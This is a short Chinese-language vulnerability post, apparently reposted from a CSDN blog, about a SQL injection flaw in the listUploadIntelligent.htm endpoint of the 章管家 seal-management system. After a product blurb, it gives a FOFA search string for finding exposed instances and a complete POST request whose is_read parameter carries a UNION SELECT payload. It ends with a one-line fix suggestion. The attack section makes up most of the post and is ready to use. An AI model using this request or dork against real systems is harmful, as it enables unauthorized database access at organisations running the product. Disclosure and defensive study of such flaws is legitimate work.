1 产品简介
章管家是一款集智能印章管理系统、APP、智能终端设备于一体的印章智慧管理解决方案,由上海建业信息科技股份有限公司推出。该产品旨在通过智能化手段,解决企业实体印章使用与管理的难点与痛点,提升印章管理的安全性和效率,为企业印章管理提供了强有力的支持。
2 漏洞概述
X管家listUploadIntelligent.htm接口存在sql注入
3 复现环境
FOFA:
body="章管家登录-公章在外防私盖"
4 漏洞复现
poc
漏洞链接:http://xxx.xx.xxx.xx/app/message/listUploadIntelligent.htm?token=dingtalk_token
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xxx
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
person_id=1&unit_id=1&pageNo=1&is_read=-1 union select user(),2,3,4,5,6,7,8,9,10,11,12 --
5 修复建议
关闭互联网暴露免或接口设置访问权限
标签:listUploadIntelligent,htm,xxx,xx,印章,token,sql From: https://blog.csdn.net/weixin_45790890/article/details/141950582